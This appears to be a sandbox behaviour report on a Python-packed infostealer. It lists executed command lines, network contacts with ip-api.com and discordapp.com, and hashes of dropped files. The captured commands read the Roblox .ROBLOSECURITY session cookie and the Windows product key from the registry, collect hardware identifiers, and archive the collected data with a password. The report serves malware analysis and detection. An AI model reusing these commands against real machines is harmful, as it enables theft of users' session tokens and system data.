C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES43A0.tmp" "c:\Users\Admin\AppData\Local\Temp\pkckntpt\CSCEE286FF59FEA47D09589A43890A1D67D.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\TpyFv.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe a -r -hp"Zachattack091010!" "C:\Users\Admin\AppData\Local\Temp\TpyFv.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
DE 142.250.186.99:443 gstatic.com tcp
US 8.8.8.8:53 99.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 130.118.77.104.in-addr.arpa udp
US 8.8.8.8:53 84.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI34842\python311.dll

MD5 76eb1ad615ba6600ce747bf1acde6679
SHA1 d3e1318077217372653be3947635b93df68156a4
SHA256 30be871735591ad96bc3fc7e541cdef474366159c2f7443feb30739cbd2db7e1
SHA512 2b960e74dd73f61d6a44fef0de9f2d50bcf2ec856b7aa5b97f0107e3cdadea461790760668a67db2ecaf71ff323133ee39ce2b38aafff3629c14e736d6a64aeb

C:\Users\Admin\AppData\Local\Temp\_MEI34842\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/2000-25-0x00007FFD30D50000-0x00007FFD3133E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI34842\base_library.zip

MD5 81cd6d012885629791a9e3d9320c444e
SHA1 53268184fdbddf8909c349ed3c6701abe8884c31
SHA256 a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd
SHA512 d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_ctypes.pyd

MD5 ee2d4cd284d6bad4f207195bf5de727f
SHA1 781344a403bbffa0afb080942cd9459d9b05a348
SHA256 2b5fe7c399441ac2125f50106bc92a2d8f5e2668886c6de79452b82595fc4009
SHA512 a6b3ad33f1900132b2b8ff5b638cbe7725666761fc90d7f76fc835ecd31dfefc48d781b12b1e60779191888931bb167330492599c5fea8afa51e9c0f3d6e8e55

memory/2000-30-0x00007FFD43B50000-0x00007FFD43B74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_ssl.pyd

MD5 936919f3509b2a913bf9e05723bc7cd2
SHA1 6bf9f1ecfcd71fc1634b2b70fcd567d220b1a6bd
SHA256 efce6dcf57915f23f10c75f6deaf6cb68efe87426caad4747ca908199b1f01e3
SHA512 2b2436e612b6cd60d794f843498fcbf8624a80e932d242592e569e32ec1d40a25d80e2c7e9f8edc7fc0478cef2ec6f77ad6c6ebbddf5afb027263397c91c73c3

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_sqlite3.pyd

MD5 c9d6ffa3798bb5ae9f1b082d66901350
SHA1 25724fecf4369447e77283ece810def499318086
SHA256 410dad8d8b4ccf6f22701a2cdcb1bb5fd10d8efa97a21b1f5c7e1b8afc9f4fec
SHA512 878b10771303cb885039348fc7549338ad2ce609f4df6fff6588b079ab9efb624d6bc31474e806ad2a97785b30877b8241286276f36aab9e50a92cbf11adc448

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_socket.pyd

MD5 3ea95c5c76ea27ca44b7a55f6cfdcf53
SHA1 aace156795cfb6f418b6a68a254bb4adfc2afc56
SHA256 7367f5046980d3a76a6ddefc866b203cbaced9bb17f40ea834aed60bb5b65923
SHA512 916effbe6130a7b6298e1bd62e1e83e9d3defc6a7454b9044d953761b38808140a764ded97dcb1ab9d0fa7f05ae08c707da7af1c15f672a959ad84aa8da114c0

memory/2000-48-0x00007FFD49860000-0x00007FFD4986F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_queue.pyd

MD5 8b3ba5fb207d27eb3632486b936396a3
SHA1 5ad45b469041d88ec7fd277d84b1e2093ec7f93e
SHA256 9a1e7aaf48e313e55fc4817f1e7f0bfe0a985f30c024dcc8d28d67f8ff87a051
SHA512 18f5a0b1a384e328d07e59a5cefbc25e027adf24f336f5ec923e38064312ea259851167bc6bc0779e2d05cd39ddd8d16a2dfd15751c83ee58fda3b1187edc54b

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_lzma.pyd

MD5 5eee7d45b8d89c291965a153d86592ee
SHA1 93562dcdb10bd93433c7275d991681b299f45660
SHA256 7b5c5221d9db2e275671432f22e4dfca8fe8a07f6374fcfed15d9a3b2fdf07d9
SHA512 0d8f178ff5ef1e87aa4aae41089d063985c11544f85057e3860bcab1235f5ddb1cb582550a482c8b7eb961211fa67777e30b678294258ada27c423070ce8453e

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_hashlib.pyd

MD5 6d2132108825afd85763fc3b8f612b11
SHA1 af64b9b28b505e4eab1b8dd36f0ecf5511cc78a0
SHA256 aba69b3e817bfb164ffc7549c24b68addb1c9b88a970cf87bec99d856049ee52
SHA512 196bcf97034f1767a521d60423cca9d46a6447156f12f3eac5d1060a7fa26ac120c74c3ef1513e8750090d37531d014a48dd17db27fbfbb9c4768aa3aca6d5c0

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_decimal.pyd

MD5 918e513c376a52a1046c4d4aee87042d
SHA1 d54edc813f56c17700252f487ef978bde1e7f7e1
SHA256 f9570f5d214d13446ed47811c7674e1d77c955c60b9fc7247ebcb64a32ae6b29
SHA512 ac2990a644920f07e36e4cb7af81aab82a503e579ce02d5026931631388e2091a52c12e4417e8c747f2af9aa9526b441a3f842387b5be534633c2258beeed497

C:\Users\Admin\AppData\Local\Temp\_MEI34842\_bz2.pyd

MD5 341a6188f375c6702de4f9d0e1de8c08
SHA1 204a508ca6a13eb030ed7953595e9b79b9b9ba3b
SHA256 7039e1f1aef638c8dd8f8a4c55fd337219a4005dca2b557ba040171c27b02a1e
SHA512 5976f053ff865313e3b37b58ca053bc2778df03b8488bb0d47b0e08e1e7ba77ccf731b44335df0cea7428b976768bedc58540e68b54066a48fc4d8042e1d8a24

C:\Users\Admin\AppData\Local\Temp\_MEI34842\unicodedata.pyd

MD5 6279c26d085d1b2efd53e9c3e74d0285
SHA1 bd0d274fb9502406b6b9a5756760b78919fa2518
SHA256 411bfb954b38ec4282d10cecb5115e29bffb0b0204ffe471a4b80777144b00f6
SHA512 30fdeed6380641fbb4d951d290a562c76dd44b59194e86f550a4a819f46a0deb7c7a2d94867cc367c41dcab9efb95628d65fe9a039c0e14a679c149148d82ac9

C:\Users\Admin\AppData\Local\Temp\_MEI34842\sqlite3.dll

MD5 cc9d1869f9305b5a695fc5e76bd57b72
SHA1 c6a28791035e7e10cfae0ab51e9a5a8328ea55c1
SHA256 31cb4332ed49ce9b31500725bc667c427a5f5a2a304595beca14902ba7b7eeee
SHA512 e6c96c7c7665711608a1ba6563b7b4adb71d0bf23326716e34979166de65bc2d93cb85d0cb76475d55fd042da97df978f1423c099ad5fbeeaef8c3d5e0eb7be1

C:\Users\Admin\AppData\Local\Temp\_MEI34842\select.pyd

MD5 2398a631bae547d1d33e91335e6d210b
SHA1 f1f10f901da76323d68a4c9b57f5edfd3baf30f5
SHA256 487fd8034efaf55106e9d04fc5d19fcd3e6449f45bc87a4f69189cd4ebb22435
SHA512 6568982977b8adb6ee04b777a976a2ecc3e4db1dffbd20004003a204eb5dae5980231c76c756d59a5309c2b1456cb63ab7671705a2c2e454c667642beb018c21

C:\Users\Admin\AppData\Local\Temp\_MEI34842\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI34842\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI34842\libssl-3.dll

MD5 6eda5a055b164e5e798429dcd94f5b88
SHA1 2c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256 377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA512 74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

C:\Users\Admin\AppData\Local\Temp\_MEI34842\libcrypto-3.dll

MD5 27515b5bb912701abb4dfad186b1da1f
SHA1 3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256 fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512 087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

C:\Users\Admin\AppData\Local\Temp\_MEI34842\blank.aes

MD5 aa8030686d448b5a88f72b770c0f8c3a
SHA1 498f03e1dd788ff33cdd570eb00a85ee0e035bcd
SHA256 6a7c9ca577a6df02833911bea20dcec90e40f3dafaab330eff316cbfb4e24e8b
SHA512 f8eaf48d3919e85fd1eda64dc453c1fb1ea719a68e6b128ba19fe6ad74f123c7de8379a39d31cf67e25a45023716cd7e171933e0be1cd2a3a8d60f496f3e77af

C:\Users\Admin\AppData\Local\Temp\_MEI34842\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

memory/2000-54-0x00007FFD401B0000-0x00007FFD401DD000-memory.dmp

memory/2000-56-0x00007FFD40190000-0x00007FFD401A9000-memory.dmp

memory/2000-58-0x00007FFD3FFD0000-0x00007FFD3FFF3000-memory.dmp

memory/2000-60-0x00007FFD309E0000-0x00007FFD30B56000-memory.dmp

memory/2000-65-0x00007FFD404E0000-0x00007FFD404ED000-memory.dmp

memory/2000-67-0x00007FFD3FF50000-0x00007FFD3FF83000-memory.dmp

memory/2000-70-0x00007FFD30910000-0x00007FFD309DD000-memory.dmp

memory/2000-74-0x0000018F35820000-0x0000018F35D42000-memory.dmp

memory/2000-78-0x00007FFD40180000-0x00007FFD4018D000-memory.dmp

memory/2000-79-0x00007FFD2FD00000-0x00007FFD2FE1C000-memory.dmp

memory/2000-81-0x00007FFD3CD20000-0x00007FFD3CD34000-memory.dmp

memory/2000-80-0x00007FFD303E0000-0x00007FFD30902000-memory.dmp

memory/2000-71-0x00007FFD30D50000-0x00007FFD3133E000-memory.dmp

memory/2000-62-0x00007FFD3FF90000-0x00007FFD3FFA9000-memory.dmp

memory/2000-82-0x00007FFD43B50000-0x00007FFD43B74000-memory.dmp

memory/4856-83-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/4856-84-0x000001B371A80000-0x000001B371A90000-memory.dmp

memory/4856-85-0x000001B371A80000-0x000001B371A90000-memory.dmp

memory/4856-92-0x000001B371A50000-0x000001B371A72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_waaktbr0.nq3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/956-97-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/956-99-0x000001B49DB90000-0x000001B49DBA0000-memory.dmp

memory/956-98-0x000001B49DB90000-0x000001B49DBA0000-memory.dmp

memory/3748-109-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/3748-110-0x000001DC27BD0000-0x000001DC27BE0000-memory.dmp

memory/4260-132-0x00000139F37C0000-0x00000139F37D0000-memory.dmp

memory/2000-134-0x00007FFD3FFD0000-0x00007FFD3FFF3000-memory.dmp

memory/3404-133-0x00000251A06E0000-0x00000251A06F0000-memory.dmp

memory/4260-128-0x00000139F37C0000-0x00000139F37D0000-memory.dmp

memory/3404-126-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/4260-120-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/4856-147-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\pkckntpt\pkckntpt.cmdline

MD5 08bf01b01ac8a68d7fc98a1f7ae670b0
SHA1 7c0e975cc5e68e7e77a9219db87ee787e638815d
SHA256 01dc517fd7c36caad4300f91c50b93786fcd51cb365126bfbd522d8d19c0eaa5
SHA512 2a2cd20e3530eab0c9988e04fac628320ba996d8ee36c5596617d811b6c17dd96e647ac3b8a5dbebc56d7c5fe33916e4c50408514fd312cb241aaf16bf63e96a

memory/3404-157-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/956-177-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/3748-181-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

memory/4260-182-0x00007FFD2F1D0000-0x00007FFD2FC91000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bf7b73e38e4a79c2a863a0c331e2000e
SHA1 8086254ce77c67e94b9c1380e3f502523399ab9e
SHA256 669c79889af6eeb7b96e8050999bf35a9c731b0f03df64496939ebdc043fdad0
SHA512 a777d81016f910303546a20f3d1a666fb408fc7c0b442874a910b84317682befc8287c5eb04e5f00fdee156675b699538d9ae3e47dcde24da4f35e68b649e241

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

memory/4260-165-0x00000139DB550000-0x00000139DB558000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pkckntpt\pkckntpt.dll

MD5 d92d7eba72a80135b702e2af00231690
SHA1 b483458dd24cf814f5103b3810d7237fd2896481
SHA256 312ef5537dc7b22533fcf12b17eabdc1dcaa021d5e009b770acc57460c3a6997
SHA512 0c45a5e04774eb28ff60f3e86fee479a4b5d8c4078123f4ea06c0bbe171c772abe0359b5e036320c36946cdf587d54bf8206c0529478db69cb6687356927aed4

C:\Users\Admin\AppData\Local\Temp\RES43A0.tmp

MD5 45be72ba7b58b9dbb44697564aff5746
SHA1 ad0f3808d4fc8013a230760508a17dbd046c246c
SHA256 821e38d5b46642c2d003d06d3f7c0c882a9f24b57474c301c7854a29615f78a7
SHA512 c1ad94d224ecb7302746c0b84d0b7a8e807196b9bee26e772dcb061184562267a8e3b463c18302ac8cb30b50565354dd65210f6acb901015c4012aa1af458576

\??\c:\Users\Admin\AppData\Local\Temp\pkckntpt\CSCEE286FF59FEA47D09589A43890A1D67D.TMP

MD5 621a219ba256c8f4b872713e1863c444
SHA1 f26f9e1947868d25054d54b5c513ecfee19242c3
SHA256 a3d61d9a2a39e6b1c94cd8c9c860b4bbadba0e670a98cd7992b52f690daa40ab
SHA512 71e404c079c1901227533cec05c5f13e5c53495c60425717a3f805d9dc7d3a31e987fc550c9a21eabf3937597a07d411a9bcb1cde6a1cecd5e3c62678194e6bf

memory/2000-217-0x00007FFD3FF90000-0x00007FFD3FFA9000-memory.dmp

memory/2000-216-0x00007FFD309E0000-0x00007FFD30B56000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/3096-228-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/3096-229-0x000002034D440000-0x000002034D450000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\pkckntpt\pkckntpt.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

memory/3096-230-0x000002034D440000-0x000002034D450000-memory.dmp

memory/2000-234-0x00007FFD30910000-0x00007FFD309DD000-memory.dmp

memory/2000-244-0x0000018F35820000-0x0000018F35D42000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

memory/4352-248-0x0000026A32D70000-0x0000026A32D80000-memory.dmp

memory/4352-246-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/4352-247-0x0000026A32D70000-0x0000026A32D80000-memory.dmp

memory/2000-249-0x00007FFD3FF50000-0x00007FFD3FF83000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\    ​     \Display (1).png

MD5 3d5aec3a24d34de388b4a420abbfa874
SHA1 5bd8e9d330f0d13eb9fbf39eaa235c9700865540
SHA256 01b3994ce2935e10f184b251da58315281b5c7b847bfd322486d51b2446b7735
SHA512 34f0de2186dbebfd08b9b8c3d069020b8782b82e398ab1b5662640df1e74ee9278d0d055e24a2d56d7672f091255f16113061af8f0a41e171ab9c81f39b9cd67

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Videos.txt

MD5 e140e10b2b43ba6f978bee0aa90afaf7
SHA1 bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256 c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512 df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Pictures.txt

MD5 823f010349af77dfbf69b1a3dd6193cb
SHA1 cf14f537ad8c0926f0fcd67ef246ac8bf7d4134e
SHA256 73832e83177f8b9a30d8c2e11ddfc4869e2c9e5ca64eb1a7895e587a2ef2fa2c
SHA512 b82dd6d69490634a59f1dde25ced107fa5abda784af097caa7fa7b9949347406e8b64144cc8639228bdaf1f44ecde29e7724f8e71768d0a77c1eea298631c63b

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Music.txt

MD5 d3ab47558ad0b3d1e5fd48ed4d6748a9
SHA1 0a3f23e77552b8285a15af3bfa3cc5b158ce53be
SHA256 21f17383f2c839afbb0ff0411e36103255fc549544717901acf5ef6a72c95656
SHA512 e2ae29c0a80dd4e84f76c0e21fac6e0fe85b258bee5c63c33499c0d3ffc95917086ef253dc0045febe02e28329078f43730b33e74093862831e897aaae2b33a4

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Downloads.txt

MD5 62260e5e102350fca99a70e3ef75eab7
SHA1 bf07469ed9b0cb1b6724cba25db434f93dcb2ec3
SHA256 3f76d6d81003e8fcc9c85daeb92891adfd0a0a27894dd886644ad3ebe4c8e13c
SHA512 b6c114eda1f59f20c329b1024bcc7876897e58c06dca6fd362795a127965ae0a6a1042b023a28bf4e02265069edee0c47c7eac6f3b260a460319ed99c52308f5

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Documents.txt

MD5 e3675b6cb2259055777d40722b97a06d
SHA1 98090eef0a4a205054827abf747295810618b5e1
SHA256 60c612f3328aedd86d6f2355441a1cf63398c84b8a396d4d80aad7e10feaa0ca
SHA512 7e926089101b7f2812a25bc245f037ffcf3f500e70beea0708c5ec0621a323ab2e35eccd4971e0a133602a61b65a582d9b6b4b99a423d8ea4d168ea60d6ab32b

C:\Users\Admin\AppData\Local\Temp\    ​     \Directories\Desktop.txt

MD5 18dca103cb9f9052e49d1e07e919afe7
SHA1 09a88db39b62f83016b3b249fa2d4fdfcf87ea77
SHA256 776583ed9b7c22a0ac7c83cd870d24cbcfdeb667d8016e240b7e987282e7a3a8
SHA512 ad9b3b941642c8dabf8b778239bb772f6785b02128627abc35cfe6067a4d4d69f6d4f9b226b2715a4ad2e717924029192fc60a36b8cffd9df68c3b7b09828cf4

memory/4352-252-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TpyFv.zip

MD5 c127887c4bd5e93634d7cd0ab785ee7f
SHA1 bd264d1d63152a551ee53c590f3261710f36be43
SHA256 e694c71c8b76b58589286f85a300a86a973a281edd5bb7ff97faa37895a89167
SHA512 2bdf9933759dc5918b5516626b082f44151ec3061651bf83c6c4515eeb0321a8f2316f19848129b4e25993223b7e0399480166996bef71172398afaca88d0cec

memory/2000-266-0x00007FFD303E0000-0x00007FFD30902000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ea31fd5a6a33c82308bc60de219af3f4
SHA1 3fbdc4e89a9f029948cf76e217ff7814056aeeee
SHA256 408fb4485a08482f83a56641482ab6640ace017d9767f445231f4ac6e31b8ba1
SHA512 91587bd790e1ed7d64dff5ed45f3e45b657008bf1e9e4a6fb28d1c36dfc7cd6708cc2e0695a8350b343dd0a279dc34829da9b057c3c839b7326b4dc8f9bb74db

memory/436-277-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

memory/436-279-0x00007FFD2EF70000-0x00007FFD2FA31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\    ​     \System\Task List.txt

MD5 d8fe2e098649e7aa50647d6c2a45cf03
SHA1 2c31c72fac3384278e52ebbdbcc8363325312c5c
SHA256 29e14401f31b9823bb988f42cbb372a0d9d3f88eca8c12c7a60f051a82ece835
SHA512 1f5f81b8faf2bca37b1d038168aa58c75de04370156a22c3a809179e84cc5746919b0e4d970eb414d57102e32a5d510b69a9213a580fcdc395f80dba65e681b0

C:\Users\Admin\AppData\Local\Temp\    ​     \System\System Info.txt

MD5 16244c3920347ba5f41281a36c6f9749
